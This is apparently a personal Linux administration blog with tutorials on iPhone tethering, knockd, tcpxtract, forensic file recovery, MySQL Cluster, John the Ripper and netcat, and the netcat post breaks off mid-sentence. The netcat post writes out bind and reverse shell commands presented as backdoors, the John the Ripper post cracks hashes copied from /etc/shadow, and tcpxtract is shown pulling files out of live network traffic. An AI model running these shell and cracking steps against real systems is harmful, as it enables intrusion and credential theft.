STUFF uid=1000(x1nux)

Iphone + Ubuntu + tethering

2012-04-04T01:33:00.003-07:00

Saludos ..

El presente post es para narrar acerca de una eventualidad que actualmente vivo; por cosas del destino "Una corrida" tengo un Iphone 3gs, dicho Iphone tiene un plan de datos, pero aveces necesito conectar la Laptop con el Internet del celular.

La forma antigua era tener el Iphone con JailBreak e instalar un software crakeado llamado "MyWi" pero con el tiempo se volvió mas difícil encontrar dicho software y ponerlo a funcionar.

Dicho software "MyWi" colocaba el Iphone como AP, lo cual uno solo se conectaba a una red Wifi la cual era el Iphone.

La otra forma es conectar el Iphone con el cable USB y decirle a Linux que lo tome como una interfaz, pero eso hasta hace unos meses no se podía hacer si no con MAC, pero ahora lo podemos hacer con Ubuntu.

NOTA: No se que tipo de modificaciones Hicieron los de Ubuntu sobre el kernel y los módulos que manejan el Iphone, pero es la única distro que lo puede hacer. "Compartir Internet desde el Iphone usando el cable USB" es Ubuntu.

Con MAC, usted conecta el Iphone por cable USB y le da la opción compartir Internet al Iphone y el MAC toma el Iphone como una tarjeta de red.

Ese es exactamente el proceso que debemos hacer pero con Ubuntu.

COMO ???

1. Instalar un software llamado "blueman"

#apt-get install blueman

2. Instalar un software llamado "ipheth-utils"

#apt-get install ipheth-utils

3. Reiniciar el Ubuntu y probar

#reboot

y listo ! ya deberia de funcionar.

Espero les funcione, estamos en contacto.

knockd - a port-knocking server

2011-11-03T20:40:00.000-07:00

In computer networking, port knocking is a method of externally opening ports on a firewall by generating a connection attempt on a set of prespecified closed ports. Once a correct sequence of connection attempts is received, the firewall rules are dynamically modified to allow the host which sent the connection attempts to connect over specific port(s). A variant called Single Packet Authorization exists, where only a single 'knock' is needed, consisting of an encrypted packet.^[1]^[2]

The primary purpose of port knocking is to prevent an attacker from scanning a system for potentially exploitable services by doing a port scan, because unless the attacker sends the correct knock sequence, the protected ports will appear closed.

knockd is a port-knock server. It listens to all traffic on an ethernet (or PPP) interface, looking for special "knock" sequences of port-hits. A client makes these port-hits by sending a TCP (or UDP) packet to a port on the server. This port need not be open -- since knockd listens at the link-layer level, it sees all traffic even if it's destined for a closed port. When the server detects a specific sequence of port-hits, it runs a command defined in its configuration file. This can be used to open up holes in a firewall for quick access.

Install knockd

Download:

Download from official site. Click Here

Unzip tar.gz file:

# tar xvfz knock-0.5.tar.gz

Configure command:

# ./configure

Compile command:

# make

Install command:

# make install

Configure Knockd

The configuration main file = /etc/knockd.conf

#vi /etc/knockd.conf

[options]
logfile = /var/log/knockd.log

[openSSH]
sequence = 1025,1026,1027
seq_timeout = 5
command = /usr/sbin/iptables -A INPUT -s %IP% -p tcp -m tcp --dport 22 -j ACCEPT
tcpflags = syn

[closeSSH]
sequence = 1027,1026,1025
seq_timeout = 5
command = /usr/sbin/iptables -D INPUT -s %IP% -p tcp -m tcp --dport 22 -j ACCEPT
tcpflags = syn

Choose ports combinations in flag "sequence"; and remember that a sequence is to close ssh service and another to open ssh service.

By default

Open the SSH service: 1025, 1026, 1027

Close the SSH service: 1027, 1026, 1025

This would be the knock!!

Close ssh port in server knockd

You must be sure that ssh port "22" is closed in server machine. "Where to install the knockd"

In my case, i execute the following command to close ssh port:

# iptables -A INPUT -p tcp --dport 22 -j DROP

How to run knokd server ?

In my case i work with default Path of configuration file: /etc/knokd.conf. then execute:

#knockd -c /etc/knockd.conf

To Help .. Run:

# knockd -h
usage: knockd [options]
options:
-i, --interface network interface to listen on (default "eth0")
-d, --daemon run as a daemon
-c, --config use an alternate config file
-D, --debug output debug messages
-l, --lookup lookup DNS names (may be a security risk)
-v, --verbose be verbose
-V, --version display version
-h, --help this help

Install knock Client in other machine.

Then ... go to other machine and install knock Client.

In my case i used ubuntu:

#apt-get install knockd

Open the SSH ports in server Knockd

Then ... try knock ports in remote server:

ubuntu@user$knock 192.168.0.1 1025:tcp 1026:tcp 1027:tcp

Then .. try ssh login:

ubuntu@user$ssh -l root 192.168.0.1

Note 0: If port is opened, asked for the ssh password.

Close the SSH port using remote knock:

ubuntu@user$knock 192.168.0.1 1027:tcp 1026:tcp 1025:tcp

Note 1: If port is closed, when you try start a session ssh, the terminal does not respond. "is in a loop".

TIP !!

In my case i had to create the following configuration trying to open ssh port :

In seccion [openSSH] in "command" tag from configuration file in knokd server; add following line:

command = /usr/sbin/iptables -A INPUT -s %IP% -p tcp -m tcp --dport 22 -j ACCEPT && iptables -D INPUT -p tcp --dport 22 -j DROP && iptables -A INPUT -p tcp --dport 22 -j DROP

This line have three commands,
1. Open port to incoming IP.
2. Delete rule that block ssh port.
3. Add rule to block ssh port, again.

Note 2: In my case i dont use firewall, so i add these lines in the command tag

Thks !!

010001 - tcpxtrac - 100100

2011-11-03T19:54:00.000-07:00

tcpxtract is a tool for extracting files from network traffic based on file signatures. Extracting files based on file type headers and footers (sometimes called "carving") is an age old data recovery technique. Tools like Foremost employ this technique to recover files from arbitrary data streams. Tcpxtract uses this technique specifically for the application of intercepting files transmitted across a network. Other tools that fill a similar need are driftnet and EtherPEG. driftnet and EtherPEG are tools for monitoring and extracting graphic files on a network and is commonly used by network administrators to police the internet activity of their users. The major limitations of driftnet and EtherPEG is that they only support three filetypes with no easy way of adding more. The search technique they use is also not scalable and does not search across packet boundries. tcpxtract features the following:

Supports 26 popular file formats out-of-the-box. New formats can be added by simply editing its config file.

With a quick conversion, you can use your old Foremost config file with tcpxtract.

Custom written search algorithm is lightning fast and very scalable.

Search algorithm searches across packet boundries for total coverage and forensic quality.

Uses libpcap, a popular, portable and stable library for network data capture.

Can be used against a live network or a tcpdump formatted capture file.

Install tcpxtract

Note 0: Execute as root.

Download package:

Download from Official we site:

http://tcpxtract.sourceforge.net/

Unzip package:

#tar xvfz tcpxtract-1.0.1.tar.gz

Configure command:

#cd tcpxtract-1.0.1/
#./configure

Compile command:

#make

Install command:

#make install

Usage:

# tcpxtract
Usage: tcpxtract [OPTIONS] [[-d ] [-f ]]
Valid options include:
--file, -f to specify an input capture file instead of a device
--device, -d to specify an input device (i.e. eth0)
--config, -c use FILE as the config file
--output, -o dump files to DIRECTORY instead of current directory
--version, -v display the version number of this program
--help, -h display this lovely screen

Use case:

Get all files from eth0 device:

#tcpxtract -d eth0 -o tmp/

NOTE 1: Check tmp directory.

Using tcpxtract you can catch files of any extension like pdf, doc, jpg, png, gif or any kind if they pass through the network interface. It's your main function. !!

Thks !

Recuperar archivos borrados con foremost

2011-11-01T23:10:00.000-07:00

Foremost es un programa de consola para recuperar archivos basados en sus cabeceras, pies de página, y estructuras de datos internas. Este proceso se conoce comúnmente como la talla de los datos. Todo se puede trabajar con archivos de imagen, tales como los generados por dd, SafeBack, EnCase, etc, o directamente en un disco. Los encabezados y pies de página se puede especificar un archivo de configuración o puede usar los interruptores de línea de comandos para especificar incorporado en los tipos de archivo. Estos tipos built-in vistazo a las estructuras de datos de un formato de archivo dado que permite una recuperación más rápidas y fiables.

Instalacion de foremost

Slackware 13.37:

NOTA 0: Usando Slapget

# slapt-get --install foremost

Debian - Ubuntu

#apt-get install foremost

Ayuda de Foremost:

Ejecutarlo por primera vez para ver su ayuda

#foremost -h

Caso de uso:

Recuperar de una USB de 4GB unos archivos .ppt que fueron borrados accidentalmente.

Solución:

1ro: Sacar la imagen de la USB:

#dd if=/dev/sdc1 of=img_usb.dd

2do: Iniciar la recuperacion de archivos:

#foremost -t ppt -av img_usb.dd -o tmp/

Al terminar, se crearan carpetas dentro de tmp, las cuales indica el tipo de archivos que recuperó, en nuestro caso los ppt.

3ro: Revisar todos los archivos .ppt recuperados:

Entrar a la carpeta tmp/ppt y revizar los archivos que recuperó.

NOTA 1: Las opciones -t, -av y -o están en la ayuda de foremost “Unos renglones mas arriba”.

Buscar otro tipo de archivos con foremost

#foremost -t ppt,pdf,avi,exe,doc,docx,png,jpg -av img_usb.dd -o tmp/

Thks !

Mysql-Cluster Installation under Ubuntu Linux:

2011-11-01T16:25:00.000-07:00

MySQL Cluster is the industry's only real-time transactional relational database combining 99.999% availability with the low Total Cost of Ownership (TCO) of open source. It features a "shared-nothing" distributed architecture with no single point of failure to assure high availability and performance, allowing you to meet your most demanding mission-critical application requirements.

MySQL Cluster's real-time design delivers predictable, millisecond response times with the ability to service tens of thousands of transactions per second. Support for in-memory and disk based data, automatic data partitioning with load balancing and the ability to add nodes to a running cluster with zero downtime allows linear database scalability to handle the most unpredictable workloads.

MySQL Cluster eliminates the need for expensive shared storage, and runs on a range of commodity platforms, making it the most open and cost-effective database solution for mission critical applications.

Companies that work with Mysql-Cluster:

Alcatel-Lucent

FreeRADIUS

Shopatron Inc.

Telenor

UTStarcom

Zillow.com

go2 Media

SPEECH DESIGN

IDC

In order to implement you should know a previous vocabulary:

MySQL Cluster uses three different types of nodes (processes) :

Data node (ndbd/ndbmtd process): These nodes store the data.
Management node (ndb_mgmd process): Used for configuration and monitoring of the cluster. They are required only during node startup.[citation needed]
SQL node (mysqld process): A MySQL server (mysqld) that connects to all of the data nodes in order to perform data storage and retrieval. This node type is optional; it is possible to query data nodes directly via the NDB API.

Generally, it is expected that each node will run on a separate host computer.

Mysql-Cluster Installation under Ubuntu Linux:

Install Management Node:

#apt-get install mysql-server-5.1 mysql-cluster-server-5.1 mysql-cluster-client-5.1

Create following directories:

#mkdir /var/lib/mysql-cluster

Give the following properties:

#chown -R mysql:mysql /var/lib/mysql-cluster

Configure MGM Node service:

#vi /var/lib/mysql-cluster/config.ini

[NDBD DEFAULT]
NoOfReplicas=2
DataMemory=80M # How much memory to allocate for data storage
IndexMemory=18M # How much memory to allocate for index storage
# For DataMemory and IndexMemory, we have used the
# default values. Since the "world" database takes up
# only about 500KB, this should be more than enough for
# this example Cluster setup.
[MYSQLD DEFAULT]
[NDB_MGMD DEFAULT]
[TCP DEFAULT]
# Section for the cluster management node
[NDB_MGMD]
# IP address of the management node (this system)
HostName=192.168.0.1
# Section for the storage nodes
[NDBD]
# IP address of the first storage node
HostName=192.168.0.101
DataDir=/var/lib/mysql-cluster
BackupDataDir=/var/lib/mysql-cluster/backup
DataMemory=2048M
[NDBD]
# IP address of the second storage node
HostName=192.168.0.102
DataDir=/var/lib/mysql-cluster
BackupDataDir=/var/lib/mysql-cluster/backup
DataMemory=2048M

# one [MYSQLD] per storage node
[MYSQLD]
[MYSQLD]

Startup MGM Node service:

#ndb_mgmd -f /var/lib/mysql-cluster/config.ini

NOTE 0: If you modify or add more nodes in the configuration file, you have to restart the service with these options:

#ndb_mgmd -f /var/lib/mysql-cluster/config.ini –reload

then with

#ndb_mgmd -f /var/lib/mysql-cluster/config.ini –initial

Install Data Node service:

Install ubuntu packages:

#apt-get install mysql-server-5.1 mysql-cluster-server-5.1 mysql-cluster-client-5.1

Configure my.cnf config file:

#vi /etc/mysql/my.cnf

In tag [mysqld] add the following flags

ndbcluster

# IP address of the cluster management node

ndb-connectstring=192.168.0.1

and then … add end of file

[mysql_cluster]

# IP address of the cluster management node

ndb-connectstring=192.168.0.1

Save file ..

Create following directories:

#mkdir /var/lib/mysql-cluster

Give the following properties:

#chown -R mysql:mysql /var/lib/mysql-cluster

Startup - Mysql Data Node:

#ndbd --ndb-mgmd-host=192.168.0.1 –initial

Then …. restart mysql-server:

#/etc/init.d/mysql stop

#/etc/init.d/mysql start

NOTE 1: Do de same step to Data Node 2.

Test the Mysql-Cluster

Run in cluster management “MGM Node” the client “ndb_mgm” to check if the cluster nodes are connected:

#ndb_mgm

This should print something like:

ndb_mgm>

Then … execute “show;”

This should print something like:

ndb_mgm> show;

Connected to Management Server at: localhost:1186

Cluster Configuration

---------------------

[ndbd(NDB)] 2 node(s)

id=2 @192.168.0.101 (Version: 5.0.19, Nodegroup: 0, Master)

id=3 @192.168.0.102 (Version: 5.0.19, Nodegroup: 0)

[ndb_mgmd(MGM)] 1 node(s)

id=1 @192.168.0.103 (Version: 5.0.19)

[mysqld(API)] 2 node(s)

id=4 @192.168.0.101 (Version: 5.0.19)

id=5 @192.168.0.102 (Version: 5.0.19)

ndb_mgm>

to exit type “quit”

ndb_mgm>quit;

Now we create a test database with a test table and some data on Data Node 1:

mysql -u root -p

CREATE DATABASE mysqlclustertest;

USE mysqlclustertest;

CREATE TABLE testtable (i INT) ENGINE=NDBCLUSTER;

INSERT INTO testtable () VALUES (1);

SELECT * FROM testtable;

quit;

NOTE 2: have a look at CREATE statment: we must use ENGINE=NDBCLUSTER for all databases tables that we want to get clusteres! If you use another engine, then clustering will not work!!

Look at a select:

mysql> SELECT * FROM testtable;

+------+

| i |

+------+

| 1 |

+------+

1 row in set (0.03 sec)

Now we create the same database on Data Node 2 (yes, we still have to create it, but afterwards testable and its data should be replicated to Data Node 2, because testable uses ENGINE=NDBCLUSTER).

mysql -u root -p

CREATE DATABASE mysqlclustertest;

USE mysqlclustertest;

SELECT * FROM testtable;

The SELECT statment should deliver you the same result as before on Data Node 1.

mysql> SELECT * FROM testtable;

+------+

| i |

+------+

| 1 |

+------+

1 row in set (0.04 sec)

So .. the data was replicated from Data Node 1 to Data Node 2. Now we insert another row into testable in Data node 2.

INSERT INTO testtable () VALUES (2);

quit;

Now let's go back to Data Node 1 and check if we see the new row there:

mysql> SELECT * FROM testtable;

+------+

| i |

+------+

| 1 |

| 2 |

+------+

2 rows in set (0.05 sec)

So .. both Mysql-Cluster nodes alwas have the same data !!!

that's all ..

To remember

In MGM Node start service as follows:

#ndb_mgmd -f /var/lib/mysql-cluster/config.ini

If you modify or add more nodes in the configuration file, you have to restart the service with these options:

#ndb_mgmd -f /var/lib/mysql-cluster/config.ini –reload

then with

#ndb_mgmd -f /var/lib/mysql-cluster/config.ini –initial

In Data Nodes 1, 2 start service as follows:

#cd /var/lib/mysql-cluster

#ndbd –ndb-mgmd-host=192.168.0.1 –initial

then .. restart mysql-server

#/etc/init.d/mysql restart

#service mysql restart

Thks !

Recuperar archivos borrados bajo Linux

2011-11-01T14:23:00.000-07:00

Software con el que vamos a trabajar: SleuthKit

SleuthKit es una biblioteca y una colección de herramientas y servicios de Unix y de Windows, para permitir el análisis forense de sistemas informáticos. Esta fue escrita y mantenida por el investigador digital Brian Carrier.

SleuthKit se puede utilizar en la investigación de extracción de datos de imágenes de windows, linux y unix.

Entorno de trabajo:

Sistema Operativo: Slackware 13.37 x86_64.

Instalación completa de SleuthKit:

Requerimientos:

libewf, afflib.

Instalar libewf:

Buscar el paquete en SlackBuilds.org

#wget http://slackbuilds.org/slackbuilds/13.37/libraries/libewf.tar.gz

#tar xvfz libewf.tar.gz

#cd libewf

#wget http://downloads.sourceforge.net/project/libewf/libewf/libewf-20100226/libewf-20100226.tar.gz

#./libewf.SlackBuild

#installpkg /tmp/libewf-20100226-x86_64-1_SBo.tgz

Instalar afflib:

Buscar el paquete en SlackBuilds.org o el sitio oficial http://www.afflib.org/:

NOTA 0: Lo baje del sitio oficial; pues no me quiso instalar el software de SlackBuilds.

#wget http://afflib.org/downloads/afflib-3.6.11.tar.gz

#tar xvfz afflib-3.6.11.tar.gz

#cd afflib-3.6.11

#./configure

#make

#make install

Instalar SleuthKit:

Buscar el paquete en SlackBuilds.org

#wget http://slackbuilds.org/slackbuilds/13.37/system/sleuthkit.tar.gz

#tar xvfz sleuthkit.tar.gz

#cd sleuthkit

#wget http://downloads.sourceforge.net/sleuthkit/sleuthkit-3.2.1.tar.gz

#./sleuthkit.SlackBuild

#installpkg /tmp/sleuthkit-3.2.1-x86_64-1_SBo.tgz

Caso de uso:

USB de 8 GB con los siguientes archivos:

L3503.exe

R225.exe

clamwin-0.97.2-setup.exe

pygobject-2.26.0-x86_64-1.txz

usuario-claves.txt

Location_interface.xls

NOTA 1: Se borraron los archivos totalmente de la USB usando el atajo SHIFT + Suprimir, lo que indica que no quedaron en la papelera. Luego se desmonto la USB del sistema Operativo, y por ultimo se volvió a montar en el sistema operativo, y se saco una imagen de ella usando el siguiente comando:

#dd if=/dev/sdc1 of=img-usb.dd

Ahora trabajaremos sobre esa imagen.

Listar el contenido de la imagen usando fls:

# fls -f fat img-usb.dd

r/r 3: x1nux

(Volume Label Entry)

r/r * 5: L3503.exe

r/r * 7: R225.exe

r/r * 10: clamwin-0.97.2-setup.exe

r/r * 14: pygobject-2.26.0-x86_64-1.txz

r/r * 17: usuario-claves.txt

r/r * 20: Location_interface.xls

Como recobrar los archivos vistos con fls ?:

NOTA 2: Leer la ayuda de icat para tener en cuenta que el Tipo de File System que usamos en la usb es FAT, y tener en cuenta que el tipo de imagen que sacamos con "dd" fue una "raw"; teniendo en cuenta este tipo de cosas procedemos a:

1ro: Sacar la suma md5 del archivo borrado, antes de recobrarlo:

# icat -f fat -i raw img-usb.dd 5 | md5

8f9ccbdb647d6a7ff0c693a2700727aa -

NOTA 3: El numero 5, nombrado después de la imagen de disco "img-usb.dd" de la usb en el comando anterior, es el equivalente al archivo L3503.exe. lo pueden ver en la impresión en pantalla que arrojo el fls.

r/r * 5: L3503.exe

2do: Recobrar el archivo borrado:

# icat -f fat -i raw img-usb.dd 5 > L3503.exe

NOTA 4: Esto nos debería generar el archivo llamado L3503.exe.

3ro: Sacar el MD5 del archivo recobrado:

# md5sum L3503.exe

8f9ccbdb647d6a7ff0c693a2700727aa L3503.exe

4to: Comparar la salida del md5sum:

Compara la salida del md5sum con la salida del md5 que generamos antes de recobrar el archivo, si es el mismo, el archivo esta perfectamente recobrado.

5to: Recobrar el resto de archivos:

Sacar los MD5:

# icat -f fat -i raw img-usb.dd 7 | md5sum

588c9f669bfb9149c4f1d8e6729743ba -

# icat -f fat -i raw img-usb.dd 10 | md5sum

d9570d28cc6c37f2fbe2130dea8dc4ea -

# icat -f fat -i raw img-usb.dd 14 | md5sum

ff410eccc0f06740a37fcf4dbe9da1f3 -

# icat -f fat -i raw img-usb.dd 17 | md5sum

58f6e7264c1e3958fc94930d7b33b02b -

# icat -f fat -i raw img-usb.dd 20 | md5sum

71751923739b8533953b1fa311f678e1 -

Recobrar los archivos:

# icat -f fat -i raw img-usb.dd 7 > R225.exe

# icat -f fat -i raw img-usb.dd 10 > clamwin-0.97.2-setup.exe

# icat -f fat -i raw img-usb.dd 14 > pygobject-2.26.0-x86_64-1.txz

# icat -f fat -i raw img-usb.dd 17 > usuario-claves.txt

# icat -f fat -i raw img-usb.dd 20 > Location_interface.xls

Sacar los MD5 de los archivos recobrados:

# md5sum R225.exe

588c9f669bfb9149c4f1d8e6729743ba R225.exe

# md5sum clamwin-0.97.2-setup.exe

d9570d28cc6c37f2fbe2130dea8dc4ea clamwin-0.97.2-setup.exe

# md5sum pygobject-2.26.0-x86_64-1.txz

ff410eccc0f06740a37fcf4dbe9da1f3 pygobject-2.26.0-x86_64-1.txz

# md5sum usuario-claves.txt

58f6e7264c1e3958fc94930d7b33b02b usuario-claves.txt

# md5sum Location_interface.xls

71751923739b8533953b1fa311f678e1 Location_interface.xls

NOTA 5: Recuerda comparar los md5 de los archivos reales con los que imprimio el icat para saber si estan en perfecto estado.

Esta herremienta es usada para cómputo forense, lo cual se puede entender de la siguiente forma.

El cómputo forense, también llamado informática forense, computación forense, análisis forense digital o examinación forense digital es la aplicación de técnicas científicas y analíticas especializadas a infraestructura tecnológica que permiten identificar, preservar, analizar y presentar datos que sean válidos dentro de un proceso legal.

Dichas técnicas incluyen reconstruir el bien informático, examinar datos residuales, autenticar datos y explicar las características técnicas del uso aplicado a los datos y bienes informáticos.

Como la definición anterior lo indica, esta disciplina hace uso no solo de tecnología de punta para poder mantener la integridad de los datos y del procesamiento de los mismos; sino que también requiere de una especialización y conocimientos avanzados en materia de informática y sistemas para poder detectar dentro de cualquier dispositivo electrónico lo que ha sucedido.

La importancia de éstos y el poder mantener su integridad se basa en que la evidencia digital o electrónica es sumamente frágil. El simple hecho de darle doble clic a un archivo modificaría la última fecha de acceso del mismo.

Adicionalmente, un examinador forense digital, dentro del proceso del cómputo forense puede llegar a recuperar información que haya sido borrada desde el sistema operativo.

Gracias por la atención, espero les guste.

John the Ripper - Herramienta de Desencriptamiento

2011-10-26T22:02:00.000-07:00

John the Ripper es un programa de criptografía que aplica fuerza bruta para descifrar contraseñas. Es capaz de romper varios algoritmos de cifrado o hash, como DES, SHA-1 y otros.

Es una herramienta de seguridad muy popular, ya que permite a los administradores de sistemas comprobar que las contraseñas de los usuarios son suficientemente buenas.

John the Ripper es capaz de autodetectar el tipo de cifrado de entre muchos disponibles, y se puede personalizar su algoritmo de prueba de contraseñas. Eso ha hecho que sea uno de los más usados en este campo.

Algoritmos que entiende:

Los que se han usado comúnmente en Unix (con la llamada al sistema crypt): DES, MD5, Blowfish.
Kerberos AFS.
Hash LM (Lan Manager), el sistema usado en Windows NT/2000/XP/2003.

Mediante módulos externos, se puede hacer que también trabaje con:

MD4.
LDAP.
MySQL.
Y otros.

Carateristicas:

Optimizado para muchos modelos de procesadores.
Funciona en muchas arquitecturas y sistemas operativos.
Ataques de diccionario y por fuerza bruta.
Muy personalizable (es software libre).
Permite definir el rango de letras que se usará para construir las palabras y las longitudes.
Permite parar el proceso y continuarlo más adelante.
Permite incluir reglas en el diccionario para decir cómo han de hacerse las variaciones tipográficas.
Se puede automatizar; por ejemplo, ponerlo en cron.

Ética

Aunque esté catalogada como herramienta de cracking, John the Ripper es una utilidad para administradores muy sencilla y que no comporta peligro para el usuario si la usa de forma adecuada.

No pasa nada malo por ejecutar una herramienta de este tipo en un ordenador personal. Sin embargo, en ordenadores multiusuario a veces se prohíbe su uso, ya que al hacer fuerza bruta, es fácil que consuma todo el tiempo de CPU.

Los administradores de sistemas lo pueden emplear para evitar que sus usuarios pongan contraseñas demasiado fáciles, pero lo habitual es hacerlo mediante un programa automático, que sólo se interese por si la clave se puede adivinar fácilmente o no. En ningún caso es necesario que el administrador conozca la clave exacta; sólo ha de saber si es buena o no.

En un sistema Unix, algunos usuarios malintencionados pueden intentar usar este programa para obtener información de acceso. Para evitarlo, basta con asegurarse de que las contraseñas cifradas no estén visibles en el fichero /etc/passwd, sino en el fichero /etc/shadow, que ha tener desactivado el permiso de lectura para los usuarios normales. Esta es la configuración predeterminada en los sistemas operativos de tipo Unix (BSD, GNU/Linux, Mac OS X, etc.).

Entorno de trabajo:

Sistema Operativo: Slackware 13.37 x86_64

Descarga:

Puede ser descargado de la siguiente URL; Sitio oficial.

http://www.openwall.com/john/

Instalación John Ripper

Descomprimir:

$tar xvfz john-1.7.8.tar.bz2

Compilar:

$cd john-1.7.8/

$cd src

$make linux-x86-64

NOTA0: Los binarios o ejecutables de John ripper estan en la carpeta “run”.

Funcionamiento:

Probar john para ver que algoritmos soporta:

$cd john-1.7.8

$cd run

$./john -test

Benchmarking: Traditional DES [128/128 BS SSE2-16]... DONE
Many salts: 2150K c/s real, 2154K c/s virtual
Only one salt: 1811K c/s real, 1811K c/s virtual

Benchmarking: BSDI DES (x725) [128/128 BS SSE2-16]... DONE
Many salts: 72439 c/s real, 72730 c/s virtual
Only one salt: 70374 c/s real, 70515 c/s virtual

Benchmarking: FreeBSD MD5 [32/64 X2]... DONE
Raw: 8551 c/s real, 8551 c/s virtual

Benchmarking: OpenBSD Blowfish (x32) [32/64 X2]... DONE
Raw: 522 c/s real, 523 c/s virtual

Benchmarking: Kerberos AFS DES [48/64 4K]... DONE
Short: 267929 c/s real, 268466 c/s virtual
Long: 835481 c/s real, 835481 c/s virtual

Benchmarking: LM DES [128/128 BS SSE2-16]... DONE
Raw: 9936K c/s real, 9936K c/s virtual

Benchmarking: generic crypt(3) [?/64]... DONE
Many salts: 179788 c/s real, 180510 c/s virtual
Only one salt: 180230 c/s real, 180591 c/s virtual

Benchmarking: dummy [N/A]... DONE
Raw: 70293K c/s real, 70293K c/s virtual

Métodos de desencriptación para utilizar Jhon:

Desencriptar Simple:

$john --single mypasswd

o se puede abreviar:

$john -si mypasswd

Desencriptar múltiples archivos:

$john --single passwd1 passwd2

$john --single *passwd* *.pwd

Desencriptar con Lista de password:

$john --wordlist=password.lst --rules mypasswd

o Puede abreviar:

$john -w=password.lst -ru mypasswd

La forma de desencriptar mas poderosa; se llama incremental:

$john --incremental mypasswd

$john -i mypasswd

En algunos casos es mas rápido usar el modo incremental pero solo para password mas fáciles de encontrar, el siguiente comando tratara de encontrar password contenidos desde la "a" a "zzzzzzzz" (en un orden óptimo):

$john -i=alpha mypasswd

Jhon se puede usar también para buscar los passwords de solo un UID, usando la opción incremental, en este caso buscaremos el UID 0 que es el del usuario root de nuestro Linux:

#john -i -u=0 *.pwd

Como probar que las contraseñas de los usuarios de mi Linux son fuertes ??

Como desencriptar mis propios archivos de password de mi Linux ?

Vamos a realizar una demostración de como desencriptar los passwords de los usuarios en mi sistema Linux:

Paso #1:

Obtener los archivos que contienen la información de los usuarios del sistema y los passwords encriptados:

Como usuario root debemos sacar una copia de los archivos /etc/passwd y /etc/shadow

#cp -r /etc/passwd /etc/shadow /home/pruebas/

Paso #2

Como el usuario normal del sistema que va a usar el John Ripper; fusionar el passwd y el shadow en un solo archivo llamado mypasswd.

$cd john-1.7.8/run

$unshadow /home/pruebas/passwd /home/pruebas/shadow > mypasswd

Paso #3

Usar cualquiera de los métodos de desencriptación de john ripper en función al archivo mypasswd:

Simple:

$john -si mypasswd

Lista de password:

$john -w=password.lst -ru mypasswd

Incremental:

$john -i mypasswd

Como saber cuando ya desencriptó el password de un usuario ?

Ejemplo de como realizarlo en la maquina local:

Como root sacar las copias de los archivos /et/passwd /etc/shadow y crear un usuario de prueba:

Copias:

#cp -r /etc/passwd /etc/shadow /home/pruebas/

Creación del usuario:

#useradd user1

#passwd user1

XXXXX

Como el usuario del sistema que va a usar el John Ripper, fusionar los dos archivos en uno, para iniciar la desencriptación:

$john-1.7.8/run/unshadow /home/pruebas/passwd /home/pruebas/shadow /home/pruebas/filetocrack

Iniciar el John para la desencriptación:

$john-1.7.8/run/john /home/pruebas/filetocrack

2 segundos después encontró el password que le coloque al usuario user1:

Loaded 1 password hashes with 1 different salts (FreeBSD MD5 [32/64 X2])

12345 (user1)

NOTA1: Cabe de anotar que el password era demasiado fácil por eso lo encontró en 2 segundos …

NOTA2: Para mas formas de uso del john; leer la documentación que está dentro del paquete del John Ripper.

Gracias...

Netcat - Herramienta para redes

2011-10-25T21:25:00.000-07:00

Netcat es una herramienta de red originalmente desarrollada por Hobbit en 1996 y liberada bajo una licencia de software libre permisiva (no copyleft, similar a BSD, MIT) para UNIX. Posteriormente fue portada a Windows y Mac OS X entre otras plataformas. Netcat permite a través de intérprete de comandos y con una sintaxis sencilla abrir puertos TCP/UDP en un HOST (quedando netcat a la escucha), asociar una shell a un puerto en concreto (para conectarse por ejemplo a MS-DOS o al intérprete bash de Linux remotamente) y forzar conexiones UDP/TCP (útil por ejemplo para realizar rastreos de puertos o realizar transferencias de archivos bit a bit entre dos equipos). Existen muchos forks de esta herramienta que añaden características nuevas como GNU Netcat o Cryptcat.

Entre sus múltiples aplicaciones, es frecuente la depuración de aplicaciones de red. También es utilizada a menudo para abrir puertas traseras en un sistema.

Aunque netcat puede hacer muchas cosas, su función principal es muy simple:

1. Crea un socket con el destino indicado si es cliente, o en el puerto indicado, si es servidor

2. Una vez conectado, envía por el socket todo lo que llegue en su entrada estándar y envía a su salida estándar todo lo que llegue por el socket

Instalación netcat

Slackware:

#slackpkg install nc-1.10-x86_64-1

Ubuntu - Debian:

#apt-get install nc

Fedora - Red Hat - Centos:

#yum install nc

Windows 98 - Xp - 7

Descargar de aquí

Ayuda y parámetros de uso

NOTA: Se debe usar como usuario root.

#nc -h
[v1.10]
connect to somewhere: nc [-options] hostname port[s] [ports] ...
listen for inbound: nc -l -p port [-options] [hostname] [port]
options:
-e prog program to exec after connect [dangerous!!]
-b allow broadcasts
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h this cruft
-i secs delay interval for lines sent, ports scanned
-l listen mode, for inbound connects
-n numeric-only IP addresses, no DNS
-o file hex dump of traffic
-p port local port number
-r randomize local and remote ports
-q secs quit after EOF on stdin and delay of secs
-s addr local source address
-t answer TELNET negotiation
-u UDP mode
-v verbose [use twice to be more verbose]
-w secs timeout for connects and final net reads
-z zero-I/O mode [used for scanning]
port numbers can be individual or ranges: lo-hi [inclusive]

Ejemplos de uso.

NOTA: Para entender el funcionamiento perfecto del netcat, el lector debe saber perfectamente la teoría de Cliente/Servidor,

Chat entre dos máquinas:

Servidor:

#nc -l -p 1234

Cliente:

#nc IP-SERVER 1234

#telnet IP-SERVER 1234

Transferencia de archivos:

Servidor:

#nc -l -p 1234 < /etc/hostname

Cliente:

#nc IP-SERVER 1234

Mini servidor de tiempo:

Servidor:

#nc -l -p 1234 -e /bin/date

Cliente:

#nc IP-SERVER 1234

Shell remota - como para una puerta trasera:

Servidor:

#nc -l -p 1234 -e /bin/bash

Cliente:

#nc IP-SERVER 1234

Tunel inverso

Servidor:

#nc -l -p 1234

Cliente:

#nc IP-SERVER 1234 -e /bin/bash

Cliente de IRC:

Servidor:

#nc irc.freenode.net 6667

:adams.freenode.net NOTICE * :*** Looking up your hostname...
:adams.freenode.net NOTICE * :*** Checking Ident
:adams.freenode.net NOTICE * :*** Couldn't look up your hostname
:adams.freenode.net NOTICE * :*** No Ident response
Nick nonone USER nonone nonone nonone :nonone
:adams.freenode.net 001 nonone :Welcome to the freenode Internet Relay Chat Network nonone
:adams.freenode.net 002 nonone :Your host is adams.freenode.net[94.125.182.252/6667], running version ircd-seven-1.1.0
:adams.freenode.net 003 nonone :This server was created Thu Sep 8 2011 at 15:12:05 CEST

NOTA: Lo que esta en negrita es lo que debes escribir.

Luego puedes utilizar cualquiera de estos comandos:

LIST

JOIN #canal

PART #canal

PRIVMSG #canal :mensaje

WHO

QUIT

Servidor http sencillo:

Servidor:

#nc -l -p http -c “cat index.html”

Mas perfecto seria:

